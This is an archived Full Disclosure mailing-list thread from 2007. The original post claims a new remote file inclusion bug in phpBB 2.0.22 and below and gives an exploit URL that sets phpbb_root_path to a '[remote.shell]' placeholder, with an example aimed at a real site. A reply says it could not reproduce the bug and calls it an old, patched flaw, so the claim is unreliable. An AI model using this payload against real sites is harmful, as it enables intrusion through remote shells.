Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

[RE: 0DAY RFI in phpBB <= 2.0.22 HOT]
From: jeroen <nowhereman () moenen org>
Date: Wed, 06 Jun 2007 21:48:59 +0200

AFAIK this is a very old bug and has been fixed in all modules?
I've tested your vuln against a few installs of phpBB and can't
reproduce it... so seems it's been patched allready?

http://archives.neohapsis.com/archives/vuln-dev/2002-q1/0981.html

Regards,
Jeroen

--------  --------
From: dr.rezen () gmail com
To: full-disclosure () lists grok org uk
Subject: [Full-disclosure] 0DAY RFI in phpBB <= 2.0.22 HOT
Date: Fri, 01 Jun 2007 13:05:01 -0400


New bug found in phpBB, most pages vulnerable, theres more bugs, I\'ll post one a week:

victim/phpBB2/includes/functions_post.php?phpbb_root_path=[remote.shell]%00

For example:

http://www.phpbb.de/includes/functions_post.php?phpbb_root_path=[remote.shell]%00

Enjoy :)

BUG BY REZEN! XORCREW! H4X H4X!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • [RE: 0DAY RFI in phpBB <= 2.0.22 HOT] jeroen (Jun 06)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]